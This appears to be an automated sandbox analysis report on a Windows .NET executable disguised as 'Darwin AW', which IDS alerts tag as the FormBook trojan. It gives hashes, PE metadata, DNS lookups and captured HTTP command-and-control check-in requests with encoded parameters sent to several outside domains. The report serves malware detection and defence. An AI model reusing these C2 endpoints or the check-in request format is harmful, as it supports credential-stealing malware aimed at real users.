                                                                  SHA256:5a5510cd8e0b77c01caac5b519c66d07d1621682e08179ead01adbc8d517b913
                                                                  SHA512:262a0900141207cd427a56b89a0ddf6dd81da957e7015069833662b450608a0a94551692d06bfb01d060c7f4cd5324dd2f3bf6ca36fd02ccdfc2f1b87b48353f
                                                                  SSDEEP:12288:gH/yso4G0/mo1M3d08zo70QuynqopwCtKbvygfgGvSwpNM6M9MvWdo9S7LCn1tM4:ULzIFXF+FxViEoP+h/CshCU6+S
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....NQa..............0..8...........W... ...`....@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:138e8eccece8cccc

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4b57ae
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x61514EA3 [Mon Sep 27 04:54:59 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb575c0x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x19414.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xb37b40xb3800False0.669535602368data6.99789102279IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xb60000x194140x19600False0.391635237069data4.29441902576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xd00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0xb61800x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                  RT_ICON0xc69b80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                  RT_ICON0xcabf00x25a8data
                                                                  RT_ICON0xcd1a80x10a8data
                                                                  RT_ICON0xce2600x468GLS_BINARY_LSB_FIRST
                                                                  RT_GROUP_ICON0xce6d80x4cdata
                                                                  RT_VERSION0xce7340x31cdata
                                                                  RT_MANIFEST0xcea600x9b0XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright F@Soft
                                                                  Assembly Version1.0.6.2
                                                                  InternalNameIDLFL.exe
                                                                  FileVersion1.0.6.0
                                                                  CompanyNameF@Soft
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNameDarwin AW
                                                                  ProductVersion1.0.6.0
                                                                  FileDescriptionDarwin AW
                                                                  OriginalFilenameIDLFL.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  09/27/21-17:31:56.380230TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916580192.168.2.2234.102.136.180
                                                                  09/27/21-17:31:56.380230TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916580192.168.2.2234.102.136.180
                                                                  09/27/21-17:31:56.380230TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916580192.168.2.2234.102.136.180
                                                                  09/27/21-17:31:56.559994TCP1201ATTACK-RESPONSES 403 Forbidden804916534.102.136.180192.168.2.22
                                                                  09/27/21-17:32:24.141268TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22162.0.232.162
                                                                  09/27/21-17:32:24.141268TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22162.0.232.162
                                                                  09/27/21-17:32:24.141268TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22162.0.232.162
                                                                  09/27/21-17:33:11.306293TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917480192.168.2.2293.185.100.223
                                                                  09/27/21-17:33:11.306293TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917480192.168.2.2293.185.100.223
                                                                  09/27/21-17:33:11.306293TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917480192.168.2.2293.185.100.223

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 27, 2021 17:31:56.365921974 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.379745007 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:31:56.379933119 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.380229950 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.393846989 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:31:56.559993982 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:31:56.560043097 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:31:56.560276031 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.560431004 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.874114037 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.887252092 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:32:01.604357958 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:01.790163994 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:01.790251017 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:01.790482998 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:01.975771904 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:02.171308994 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:02.172131062 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:02.172543049 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:02.172714949 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:02.358375072 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:07.351763964 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:07.490724087 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:07.490979910 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:07.491132975 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:07.637655973 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:08.474100113 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:08.474483967 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:08.475579977 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:08.475658894 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:08.614156961 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:18.621284962 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:18.784785032 CEST8049168162.0.229.241192.168.2.22
                                                                  Sep 27, 2021 17:32:18.784881115 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:18.785186052 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:18.948822021 CEST8049168162.0.229.241192.168.2.22
                                                                  Sep 27, 2021 17:32:18.948857069 CEST8049168162.0.229.241192.168.2.22
                                                                  Sep 27, 2021 17:32:18.949249029 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:18.949389935 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:19.124420881 CEST8049168162.0.229.241192.168.2.22
                                                                  Sep 27, 2021 17:32:23.974770069 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:24.140935898 CEST8049169162.0.232.162192.168.2.22
                                                                  Sep 27, 2021 17:32:24.141038895 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:24.141268015 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:24.307697058 CEST8049169162.0.232.162192.168.2.22
                                                                  Sep 27, 2021 17:32:24.308247089 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:24.472944975 CEST8049169162.0.232.162192.168.2.22
                                                                  Sep 27, 2021 17:32:24.971518993 CEST8049169162.0.232.162192.168.2.22
                                                                  Sep 27, 2021 17:32:24.971777916 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:29.437037945 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.449552059 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.449654102 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.450268984 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.462723017 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531821966 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531872034 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531902075 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531925917 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531981945 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532022953 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.532075882 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532104969 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532128096 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532143116 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.532151937 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532176971 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532182932 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.532246113 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.544748068 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.545041084 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546432018 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546521902 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546693087 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546752930 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546894073 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546921015 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546953917 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546981096 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.547769070 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.547871113 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548048019 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548121929 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548507929 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548538923 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548590899 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548613071 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.549474001 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.549506903 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.549559116 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.549582005 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.550220013 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.550304890 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.550311089 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.550389051 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.551467896 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.551501989 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.551544905 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.551579952 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.552293062 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.552325964 CEST8049170216.239.32.21192.168.2.22

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 27, 2021 17:31:56.314769983 CEST5216753192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:31:56.350986958 CEST53521678.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:01.560457945 CEST5059153192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:01.602639914 CEST53505918.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:07.176561117 CEST5780553192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:07.350603104 CEST53578058.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:13.513216972 CEST5903053192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:13.579324961 CEST53590308.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:18.581300020 CEST5918553192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:18.620323896 CEST53591858.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:23.948707104 CEST5561653192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:23.973058939 CEST53556168.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:29.351190090 CEST4997253192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:29.435094118 CEST53499728.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:39.564275026 CEST5177153192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:39.821504116 CEST53517718.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:45.154223919 CEST5986753192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:45.198246956 CEST53598678.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:33:08.122895002 CEST5031553192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:33:08.168354034 CEST53503158.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:33:11.236748934 CEST5007253192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:33:11.279463053 CEST53500728.8.8.8192.168.2.22

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Sep 27, 2021 17:31:56.314769983 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.wwiilive.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:01.560457945 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.dunedinhyperlocal.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:07.176561117 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.oinfoproduto.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:13.513216972 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.institutosamar.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:18.581300020 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.multicoininvestment.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:23.948707104 CEST192.168.2.228.8.8.80x9037Standard query (0)www.theseattlenotary.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.351190090 CEST192.168.2.228.8.8.80xce43Standard query (0)www.petersonmovingco.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:39.564275026 CEST192.168.2.228.8.8.80xb02bStandard query (0)www.quinnwebster.topA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:45.154223919 CEST192.168.2.228.8.8.80x43f4Standard query (0)www.lianxiwan.xyzA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:33:08.122895002 CEST192.168.2.228.8.8.80x9ff7Standard query (0)www.lianxiwan.xyzA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:33:11.236748934 CEST192.168.2.228.8.8.80x1d11Standard query (0)www.area-arquitectos.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Sep 27, 2021 17:31:56.350986958 CEST8.8.8.8192.168.2.220x8eb8No error (0)www.wwiilive.comwwiilive.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:31:56.350986958 CEST8.8.8.8192.168.2.220x8eb8No error (0)wwiilive.com34.102.136.180A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:01.602639914 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.dunedinhyperlocal.comdunedinhyperlocal.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:32:01.602639914 CEST8.8.8.8192.168.2.220xc18cNo error (0)dunedinhyperlocal.com184.168.131.241A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:07.350603104 CEST8.8.8.8192.168.2.220xfc43No error (0)www.oinfoproduto.comoinfoproduto.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:32:07.350603104 CEST8.8.8.8192.168.2.220xfc43No error (0)oinfoproduto.com216.172.172.208A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:13.579324961 CEST8.8.8.8192.168.2.220x9c63Name error (3)www.institutosamar.comnonenoneA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:18.620323896 CEST8.8.8.8192.168.2.220x30e0No error (0)www.multicoininvestment.commulticoininvestment.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:32:18.620323896 CEST8.8.8.8192.168.2.220x30e0No error (0)multicoininvestment.com162.0.229.241A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:23.973058939 CEST8.8.8.8192.168.2.220x9037No error (0)www.theseattlenotary.comtheseattlenotary.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:32:23.973058939 CEST8.8.8.8192.168.2.220x9037No error (0)theseattlenotary.com162.0.232.162A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.435094118 CEST8.8.8.8192.168.2.220xce43No error (0)www.petersonmovingco.com216.239.32.21A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.435094118 CEST8.8.8.8192.168.2.220xce43No error (0)www.petersonmovingco.com216.239.34.21A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.435094118 CEST8.8.8.8192.168.2.220xce43No error (0)www.petersonmovingco.com216.239.38.21A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.435094118 CEST8.8.8.8192.168.2.220xce43No error (0)www.petersonmovingco.com216.239.36.21A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:39.821504116 CEST8.8.8.8192.168.2.220xb02bNo error (0)www.quinnwebster.topquinnwebster.topCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:32:39.821504116 CEST8.8.8.8192.168.2.220xb02bNo error (0)quinnwebster.top162.251.85.174A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:45.198246956 CEST8.8.8.8192.168.2.220x43f4No error (0)www.lianxiwan.xyz101.35.124.222A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:33:08.168354034 CEST8.8.8.8192.168.2.220x9ff7No error (0)www.lianxiwan.xyz101.35.124.222A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:33:11.279463053 CEST8.8.8.8192.168.2.220x1d11No error (0)www.area-arquitectos.com93.185.100.223A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.wwiilive.com
                                                                  • www.dunedinhyperlocal.com
                                                                  • www.oinfoproduto.com
                                                                  • www.multicoininvestment.com
                                                                  • www.theseattlenotary.com
                                                                  • www.petersonmovingco.com
                                                                  • www.quinnwebster.top

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.224916534.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:31:56.380229950 CEST0OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1
                                                                  Host: www.wwiilive.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:31:56.559993982 CEST1INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Mon, 27 Sep 2021 15:31:56 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "6151bf8f-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.2249166184.168.131.24180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:01.790482998 CEST2OUTGET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1
                                                                  Host: www.dunedinhyperlocal.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:02.171308994 CEST2INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx/1.20.1
                                                                  Date: Mon, 27 Sep 2021 15:32:02 GMT
